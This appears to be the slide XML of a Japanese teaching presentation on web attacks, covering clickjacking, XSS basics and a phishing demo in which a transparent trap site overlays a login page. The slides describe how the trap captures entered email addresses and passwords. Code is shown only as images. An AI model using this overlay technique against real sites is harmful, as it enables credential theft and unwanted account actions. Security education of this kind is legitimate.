              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面の見た目</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="フローチャート: データ 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C81C3999-B1D5-4522-93AE-A0A97ED31372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849388" y="4955902"/>
            <a:ext cx="3749038" cy="1167641"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutpu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他のサイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="フローチャート: データ 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D8007D-18D5-A614-FCD5-A3DAE020CF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849388" y="4113063"/>
            <a:ext cx="3749038" cy="1167641"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOut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透明にした罠サイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="テキスト ボックス 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F2FB88-70F2-FC78-6CB9-206ECAE06DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7356155" y="6123543"/>
            <a:ext cx="2492990" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>そのページ本来の構造</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矢印: 右 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EDB935-F44B-C9C1-A782-0A1D50E284AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231296" y="4575326"/>
            <a:ext cx="1486894" cy="108595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レイヤー</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25151156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E12FA4-27B7-34B5-3CAF-66F2CC12DC3D}"/>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4BCF7135-2CE0-5118-9C07-AC2F38A2740E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキングの被害の代表例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン後のサイトの操作関係</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対象のサイトに対して利用者が意図しない操作をされることで意図しない設定をされることや退会処理等をされる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対象のサイトのログイン画面を埋め込み、見た目を同じにして</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードを入力させ、入力されたパスワードを攻撃者のデータベースに保存する事でログイン情報を盗む。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="964706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C0696-50AB-F979-67A2-5B7FD9FB2FA0}"/>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B69D3E49-BC0F-E646-04FA-1E3326788934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>もちろん普通の文字列は送れる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6739F2DB-8B21-12B3-7834-F31C06A77F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3222557"/>
            <a:ext cx="4689201" cy="1762911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D75459-9AC0-18A1-6A92-5D2D1027E8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6491552" y="3222556"/>
            <a:ext cx="4659590" cy="1762911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矢印: 右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EC0C23-EFFC-A5BB-1E29-5A835BB96AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527401" y="4317558"/>
            <a:ext cx="964151" cy="898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送信</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11898031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0099B1-DC2C-DE31-6E42-A2C0A34577FE}"/>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1814A15B-4E7F-FA7E-169A-3C62137CBB90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>テキストボックスとボタンの位置を全く同じにした本来のサイトと罠のサイトを作成する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>本来のサイトではログインした時にログイン成功した事を知らせるテキストを出力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトでは入力されたメールアドレスとパスワードを出力。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37727176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35D5D9-DDB9-5666-5F31-A94E459CFBA9}"/>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9DF62642-4487-5A58-964A-994E208717BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリインポート</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベース接続</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッション続き</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>リダイレクト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E503845-991A-D8B6-C185-B1FB58432D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224007" y="2244655"/>
            <a:ext cx="5911502" cy="4067245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41565705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FC5FBE-B57D-3A9A-78DC-D03A823B39F2}"/>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B5B0C37D-5AEF-74DA-EB29-356BD14CB525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C0065A-1214-8077-272B-70FC29283218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3118796" y="2307499"/>
            <a:ext cx="6096765" cy="4432339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32336160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98AD78-4BCF-489C-CC76-13F558D34E35}"/>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3C05E057-F4A0-A554-4290-A029B2A21408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン成功画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3745A21E-0CA8-7828-5B73-CEF22E54B938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347654" y="2839662"/>
            <a:ext cx="5496692" cy="2800741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7234000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468951-2BAB-D186-A565-C0AD675F01DE}"/>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E57D2382-C1F5-C785-1238-62C488CDCAE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側で使われる</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D49112D-33AC-6556-44A9-9C346C687E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963318" y="6311900"/>
            <a:ext cx="2265364" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>clickjack_login.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF55D840-1B88-3E57-EC99-1BF65D08EB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816873" y="2369073"/>
            <a:ext cx="8558254" cy="3942827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31649343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90F902A7-32C7-C847-2CCF-58AC70354D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2122998" y="2209098"/>
            <a:ext cx="7480952" cy="4418313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1875B2-DA39-55B7-E07E-EFF44B117F8D}"/>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14E847BE-BB45-E494-0C7A-ACCE2AC17F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5E632A-A9D4-3D80-CEEE-4B05B7C357C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559527" y="3885248"/>
            <a:ext cx="3044423"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dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>操作メールアドレスと</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>パスワードを表示する</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12440264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E5DFC-B8C3-E3D6-913E-C742F3FFB819}"/>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0FAD7F69-303A-4278-D582-4DF91E3467AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>フィッシング詐欺</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイトのデザイン</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
